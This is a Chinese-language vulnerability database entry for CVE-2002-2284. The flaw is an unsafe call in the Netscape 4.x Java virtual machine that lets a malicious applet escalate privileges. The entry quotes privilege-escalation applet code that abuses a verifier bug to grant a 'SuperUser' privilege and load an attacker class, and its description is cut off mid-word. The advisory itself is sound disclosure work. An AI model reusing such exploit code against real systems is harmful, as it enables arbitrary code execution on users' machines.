Netscape Java虚拟机不安全调用漏洞
漏洞ID |
1203602 |
漏洞类型 |
设计错误 |
发布时间 |
2002-11-21 |
更新时间 |
2002-12-31 |
CVE编号
|
CVE-2002-2284
|
CNNVD-ID
|
CNNVD-200212-443 |
漏洞平台 |
N/A |
CVSS评分 |
6.4
|
|漏洞详情
NetscapeCommunicator/Navigator的JVM实现使用了SymantecJustInTime(JIT)编译器,Java虚拟机在共享动态实现,并默认被NetscapeBrowser使用。Netscape4浏览器Java虚拟机实现由于部分方法被调用的时候不安全,远程攻击者可以利用这个漏洞构建恶意JavaApplet,在JVM环境中装载恶意类而可能以高权限执行任意代码。构建如下applet代码运行在Netscape4.xweb浏览器中可以导致权限提升:PrivilegeManagerpm=PrivilegeManager.getPrivilegeManager();VerifierBugbug=newVerifierBug();MyPrivilegeManagermpm=bug.cast2MyPrivilegeManager(pm);Targettarget=Target.findTarget(“SuperUser”);Privilegepriv=Privilege.findPrivilege(Privilege.ALLOWED,Privilege.FOREVER);PrivilegeTableprivtab=newPrivilegeTable();privtab.put(target,priv);Principalprincipal=PrivilegeManager.getMyPrincipals()[0];mpm.itsPrinToPrivTable.put(principal,privtab);try{ClassLoadercl=getClass().getClassLoader();Classc=cl.loadClass(“Beyond”);c.newInstance();}catch(Throwablee){}获得PrivilegeManagerobject引用指针的值并保存在pm变量中,然后可利用NetscapeJVM中的一个缺陷结合其他漏洞提升权限。实际提升权限的攻击在如下代码中:Principalprincipal=PrivilegeManager.getMyPrincipals()[0];mpm.itsPrinToPrivTable.put(principal,privtab);首先,从PrivilegeManager类的Princ
|参考资料
来源:XF
名称:netscape-java-insecure-classes(10714)
链接:http://xforce.iss.net/xforce/xfdb/10714
来源:BID
名称:6223
链接:http://www.securityfocus.com/bid/6223
来源:www.lsd-pl.net
链接:http://www.lsd-pl.net/documents/javasecurity-1.0.0.pdf
来源:BUGTRAQ
名称:20021121[LSD]JavaandJVMsecurityvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=103798147613151&w;=2
来源:NSFOCUS
名称:3884
链接:http://www.nsfocus.net/vulndb/3884
相关推荐: 3D3.Com ShopFactory购物车Cookie价格操纵漏洞
3D3.Com ShopFactory购物车Cookie价格操纵漏洞 漏洞ID 1203292 漏洞类型 权限许可和访问控制 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2302 CNNVD-ID CNNVD-…
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666